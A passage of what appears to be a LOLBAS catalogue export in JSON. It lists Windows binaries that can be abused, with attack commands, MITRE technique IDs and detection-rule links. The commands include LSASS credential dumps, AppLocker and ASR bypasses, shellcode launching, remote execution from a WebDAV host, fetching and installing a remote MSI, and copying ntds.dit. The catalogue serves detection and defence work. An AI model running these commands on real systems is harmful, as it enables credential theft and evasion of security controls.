file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","Description":"Launch an executable payload by calling RouteTheCall (obfuscated).","Usecase":"Launch an executable.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\zipfldr.dll"},{"Path":"c:\\windows\\syswow64\\zipfldr.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"Resources":[{"Link":"https://twitter.com/moriarty_meng/status/977848311603380224"},{"Link":"https://twitter.com/bohops/status/997896811904929792"},{"Link":"https://windows10dll.nirsoft.net/zipfldr_dll.html"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"},{"Name":"Comsvcs.dll","Description":"COM+ Services","Author":"LOLBAS Team","Created":"2019-08-30","Commands":[{"Command":"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump [LSASS_PID] dump.bin full","Description":"Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.","Usecase":"Dump Lsass.exe process memory to retrieve credentials.","Category":"Dump","Privileges":"SYSTEM","MitreID":"T1003.001","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\comsvcs.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml"}],"Resources":[{"Link":"https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/comsvcs/"},{"Name":"AccCheckConsole.exe","Description":"Verifies UI accessibility requirements","Author":"bohops","Created":"2022-01-02","Commands":[{"Command":"AccCheckConsole.exe -window \"Untitled - Notepad\" C:\\path\\to\\your\\lolbas.dll","Description":"Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.","Usecase":"Local execution of managed code from assembly DLL.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows","Tags":[{"Execute":"DLL"}]},{"Command":"AccCheckConsole.exe -window \"Untitled - Notepad\" C:\\path\\to\\your\\lolbas.dll","Description":"Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.","Usecase":"Local execution of managed code to bypass AppLocker.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe"},{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe"},{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe"},{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"},{"IOC":"Sysmon Event ID 1 - Process Creation"},{"Analysis":"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340"}],"Resources":[{"Link":"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340"},{"Link":"https://twitter.com/bohops/status/1477717351017680899"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"},{"Name":"adplus.exe","Description":"Debugging tool included with Windows Debugging Tools","Author":"mr.d0x","Created":"2021-09-01","Commands":[{"Command":"adplus.exe -hang -pn lsass.exe -o c:\\users\\mr.d0x\\output\\folder -quiet","Description":"Creates a memory dump of the lsass process","Usecase":"Create memory dump and parse it offline","Category":"Dump","Privileges":"SYSTEM","MitreID":"T1003.001","OperatingSystem":"All Windows"},{"Command":"adplus.exe -c config-adplus.xml","Description":"Execute arbitrary commands using adplus config file (see Resources section for a sample file).","Usecase":"Run commands under a trusted Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"All Windows"},{"Command":"adplus.exe -c config-adplus.xml","Description":"Dump process memory using adplus config file (see Resources section for a sample file).","Usecase":"Run commands under a trusted Microsoft signed binary","Category":"Dump","Privileges":"SYSTEM","MitreID":"T1003.001","OperatingSystem":"All Windows"},{"Command":"adplus.exe -crash -o \"C:\\temp\\\" -sc calc.exe","Description":"Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.","Usecase":"Run commands under a trusted Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"All windows"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe"},{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"IOC":"As a Windows SDK binary, execution on a system may be suspicious"}],"Resources":[{"Link":"https://mrd0x.com/adplus-debugging-tool-lsass-dump/"},{"Link":"https://twitter.com/nas_bench/status/1534916659676422152"},{"Link":"https://twitter.com/nas_bench/status/1534915321856917506"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/"},{"Name":"AgentExecutor.exe","Description":"Intune Management Extension included on Intune Managed Devices","Author":"Eleftherios Panos","Created":"2020-07-23","Commands":[{"Command":"AgentExecutor.exe -powershell \"c:\\temp\\malicious.ps1\" \"c:\\temp\\test.log\" \"c:\\temp\\test1.log\" \"c:\\temp\\test2.log\" 60000 \"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\" 0 1","Description":"Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument","Usecase":"Execute unsigned powershell scripts","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10"},{"Command":"AgentExecutor.exe -powershell \"c:\\temp\\malicious.ps1\" \"c:\\temp\\test.log\" \"c:\\temp\\test1.log\" \"c:\\temp\\test2.log\" 60000 \"C:\\temp\\\" 0 1","Description":"If we place a binary named powershell.exe in the path c:\\temp, agentexecutor.exe will execute it successfully","Usecase":"Execute a provided EXE","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Intune Management Extension"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"}],"Resources":[{"Link":null}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/"},{"Name":"AppCert.exe","Description":"Windows App Certification Kit command-line tool.","Author":"Avihay Eldad","Created":"2024-03-06","Commands":[{"Command":"appcert.exe test -apptype desktop -setuppath c:\\windows\\system32\\notepad.exe -reportoutputpath c:\\users\\public\\output.xml","Description":"Execute an executable file via the Windows App Certification Kit command-line tool.","Usecase":"Performs execution of specified file, can be used as a defense evasion","Category":"Execute","Privileges":"Administrator","MitreID":"T1127","OperatingSystem":"Windows"},{"Command":"appcert.exe test -apptype desktop -setuppath c:\\users\\public\\malicious.msi -setupcommandline /q -reportoutputpath c:\\users\\public\\output.xml","Description":"Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.","Usecase":"Execute custom made MSI file with malicious code","Category":"Execute","Privileges":"Administrator","MitreID":"T1218.007","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe"},{"Path":"C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"}],"Detection":null,"Resources":[{"Link":"https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appcert/"},{"Name":"Appvlp.exe","Description":"Application Virtualization Utility Included with Microsoft Office 2016","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"AppVLP.exe \\\\webdav\\calc.bat","Usecase":"Execution of BAT file hosted on Webdav server.","Description":"Executes calc.bat through AppVLP.exe","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10 w/Office 2016"},{"Command":"AppVLP.exe powershell.exe -c \"$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)\"","Usecase":"Local execution of process bypassing Attack Surface Reduction (ASR).","Description":"Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10 w/Office 2016"},{"Command":"AppVLP.exe powershell.exe -c \"$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\\\webdav\\xll_poc.xll')\"","Usecase":"Local execution of process bypassing Attack Surface Reduction (ASR).","Description":"Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10 w/Office 2016"}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml"}],"Resources":[{"Link":"https://github.com/MoooKitty/Code-Execution"},{"Link":"https://twitter.com/moo_hax/status/892388990686347264"},{"Link":"https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/"},{"Link":"https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"},{"Name":"Bginfo.exe","Description":"Background Information Utility included with SysInternals Suite","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"bginfo.exe bginfo.bgi /popup /nolicprompt","Description":"Execute VBscript code that is referenced within the bginfo.bgi file.","Usecase":"Local execution of VBScript","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows","Tags":[{"Execute":"WSH"}]},{"Command":"bginfo.exe bginfo.bgi /popup /nolicprompt","Description":"Execute VBscript code that is referenced within the bginfo.bgi file.","Usecase":"Local execution of VBScript","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows","Tags":[{"Execute":"WSH"}]},{"Command":"\\\\10.10.10.10\\webdav\\bginfo.exe bginfo.bgi /popup /nolicprompt","Usecase":"Remote execution of VBScript","Description":"Execute bginfo.exe from a WebDAV server.","Category":"Execute","Privileges":"User","MitreID":"T1218","Tags":[{"Execute":"WSH"}],"OperatingSystem":"Windows"},{"Command":"\\\\10.10.10.10\\webdav\\bginfo.exe bginfo.bgi /popup /nolicprompt","Usecase":"Remote execution of VBScript","Description":"Execute bginfo.exe from a WebDAV server.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows","Tags":[{"Execute":"WSH"}]},{"Command":"\\\\live.sysinternals.com\\Tools\\bginfo.exe \\\\10.10.10.10\\webdav\\bginfo.bgi /popup /nolicprompt","Usecase":"Remote execution of VBScript","Description":"This style of execution may not longer work due to patch.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows","Tags":[{"Execute":"WSH"}]},{"Command":"\\\\live.sysinternals.com\\Tools\\bginfo.exe \\\\10.10.10.10\\webdav\\bginfo.bgi /popup /nolicprompt","Usecase":"Remote execution of VBScript","Description":"This style of execution may not longer work due to patch.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows","Tags":[{"Execute":"WSH"}]}],"Full_Path":[{"Path":"No fixed path"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"Resources":[{"Link":"https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"},{"Name":"Cdb.exe","Description":"Debugging tool included with Windows Debugging Tools.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"cdb.exe -cf x64_calc.wds -o notepad.exe","Description":"Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.","Usecase":"Local execution of assembly shellcode.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"},{"Command":"cdb.exe -pd -pn <process_name>\n.shell <cmd>\n","Description":"Attaching to any process and executing shell commands.","Usecase":"Run a shell command under a trusted Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"},{"Command":"cdb.exe -c C:\\debug-script.txt calc","Description":"Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).","Usecase":"Run commands under a trusted Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe"},{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"Resources":[{"Link":"http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html"},{"Link":"https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options"},{"Link":"https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda"},{"Link":"https://mrd0x.com/the-power-of-cdb-debugging-tool/"},{"Link":"https://twitter.com/nas_bench/status/1534957360032120833"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"},{"Name":"coregen.exe","Description":"Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.","Author":"Martin Sohn Christensen","Created":"2020-10-09","Commands":[{"Command":"coregen.exe /L C:\\folder\\evil.dll dummy_assembly_name","Description":"Loads the target .DLL in arbitrary path specified with /L.","Usecase":"Execute DLL code","Category":"Execute","Privileges":"User","MitreID":"T1055","OperatingSystem":"Windows","Tags":[{"Execute":"DLL"}]},{"Command":"coregen.exe dummy_assembly_name","Description":"Loads the coreclr.dll in the corgen.exe directory (e.g. C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0).","Usecase":"Execute DLL code","Category":"Execute","Privileges":"User","MitreID":"T1055","OperatingSystem":"Windows"},{"Command":"coregen.exe /L C:\\folder\\evil.dll dummy_assembly_name","Description":"Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.","Usecase":"Execute DLL code","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"IOC":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"IOC":"coregen.exe loading .dll file not named coreclr.dll"},{"IOC":"coregen.exe command line containing -L or -l"},{"IOC":"coregen.exe command line containing unexpected/invald assembly name"},{"IOC":"coregen.exe application crash by invalid assembly name"}],"Resources":[{"Link":"https://www.youtube.com/watch?v=75XImxOOInU"},{"Link":"https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/"},{"Name":"Createdump.exe","Description":"Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)","Author":"mr.d0x, Daniel Santos","Created":"2022-01-20","Commands":[{"Command":"createdump.exe -n -f dump.dmp [PID]","Description":"Dump process by PID and create a minidump file. If \"-f dump.dmp\" is not specified, the file is created as '%TEMP%\\dump.%p.dmp' where %p is the PID of the target process.","Usecase":"Dump process memory contents using PID.","Category":"Dump","Privileges":"SYSTEM","MitreID":"T1003","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\*\\createdump.exe"},{"Path":"C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\*\\createdump.exe"},{"Path":"C:\\Program Files\\Microsoft Visual Studio\\*\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\*\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml"},{"IOC":"createdump.exe process with a command line containing the lsass.exe process id"}],"Resources":[{"Link":"https://twitter.com/bopin2020/status/1366400799199272960"},{"Link":"https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/"},{"Name":"csi.exe","Description":"Command line interface included with Visual Studio.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"csi.exe file","Description":"Use csi.exe to run unsigned C# code.","Usecase":"Local execution of unsigned C# code.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe"},{"Path":"c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"Resources":[{"Link":"https://twitter.com/subTee/status/781208810723549188"},{"Link":"https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/"},{"Name":"DefaultPack.EXE","Description":"This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.","Author":"@checkymander","Created":"2020-10-01","Commands":[{"Command":"DefaultPack.EXE /C:\"process.exe args\"","Description":"Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.","Usecase":"Can be used to execute stagers, binaries, and other malicious commands.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft\\DefaultPack\\"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml"},{"IOC":"DefaultPack.EXE spawned an unknown process"}],"Resources":[{"Link":"https://twitter.com/checkymander/status/1311509470275604480."}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/"},{"Name":"Devinit.exe","Description":"Visual Studio 2019 tool","Author":"mr.d0x","Created":"2022-01-20","Commands":[{"Command":"devinit.exe run -t msi-install -i https://example.com/out.msi","Description":"Downloads an MSI file to C:\\Windows\\Installer and then installs it.","Usecase":"Executes code from a (remote) MSI file.","Category":"Execute","Privileges":"User","MitreID":"T1218.007","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft Visual Studio\\*\\Community\\Common7\\Tools\\devinit\\devinit.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\*\\Community\\Common7\\Tools\\devinit\\devinit.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml"}],"Resources":[{"Link":"https://twitter.com/mrd0x/status/1460815932402679809"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/"},{"Name":"Devtoolslauncher.exe","Description":"Binary will execute specified binary. Part of VS/VScode installation.","Author":"felamos","Created":"2019-10-04","Commands":[{"Command":"devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] \"argument here\" test","Description":"The above binary will execute other binary.","Usecase":"Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary. https://i.imgur.com/Go7rc0I.png","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 7 and up with VS/VScode installed"},{"Command":"devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] \"argument here\" test","Description":"The above binary will execute other binary.","Usecase":"Execute any binary with given arguments.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 7 and up with VS/VScode installed"}],"Full_Path":[{"Path":"c:\\windows\\system32\\devtoolslauncher.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml"},{"IOC":"DeveloperToolsSvc.exe spawned an unknown process"}],"Resources":[{"Link":"https://twitter.com/_felamos/status/1179811992841797632"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"},{"Name":"dnx.exe","Description":".Net Execution environment file included with .Net.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"dnx.exe consoleapp","Description":"Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)","Usecase":"Local execution of C# project stored in consoleapp folder.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"N/A"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"Resources":[{"Link":"https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dnx/"},{"Name":"Dotnet.exe","Description":"dotnet.exe comes with .NET Framework","Author":"felamos","Created":"2019-11-12","Commands":[{"Command":"dotnet.exe [PATH_TO_DLL]","Description":"dotnet.exe will execute any dll even if applocker is enabled.","Usecase":"Execute code bypassing AWL","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with .NET installed"},{"Command":"dotnet.exe [PATH_TO_DLL]","Description":"dotnet.exe will execute any DLL.","Usecase":"Execute DLL","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with .NET installed"},{"Command":"dotnet.exe fsi","Description":"dotnet.exe will open a console which allows for the execution of arbitrary F# commands","Usecase":"Execute arbitrary F# code","Category":"Execute","Privileges":"User","MitreID":"T1059","OperatingSystem":"Windows 10 and up with .NET SDK installed"},{"Command":"dotnet.exe msbuild [Path_TO_XML_CSPROJ]","Description":"dotnet.exe with msbuild (SDK Version) will execute unsigned code","Usecase":"Execute code bypassing AWL","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10 and up with .NET Core installed"}],"Full_Path":[{"Path":"C:\\Program Files\\dotnet\\dotnet.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"dotnet.exe spawned an unknown process"}],"Resources":[{"Link":"https://twitter.com/_felamos/status/1204705548668555264"},{"Link":"https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc"},{"Link":"https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/"},{"Link":"https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"},{"Name":"dsdbutil.exe","Description":"Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.","Author":"Ekitji","Created":"2023-05-31","Commands":[{"Command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"create\" \"quit\" \"quit\"","Description":"dsdbutil supports VSS snapshot creation","Usecase":"Snapshoting of Active Directory NTDS.dit database","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.003","OperatingSystem":"Windows Server 2012, Windows Server 2016, Windows Server 2019"},{"Command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"mount {GUID}\" \"quit\" \"quit\"","Description":"Mounting the snapshot with its GUID","Usecase":"Mounting the snapshot to access the ntds.dit with copy c:\\[Snap Volume]\\windows\\ntds\\ntds.dit c:\\users\\administrator\\desktop\\ntds.dit.bak","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.003","OperatingSystem":"Windows Server 2012, Windows Server 2016, Windows Server 2019"},{"Command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"delete {GUID}\" \"quit\" \"quit\"","Description":"Deletes the mount of the snapshot","Usecase":"Deletes the snapshot","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.003","OperatingSystem":"Windows Server 2012, Windows Server 2016, Windows Server 2019"},{"Command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"create\" \"list all\" \"mount 1\" \"quit\" \"quit\"","Description":"Mounting with snapshot 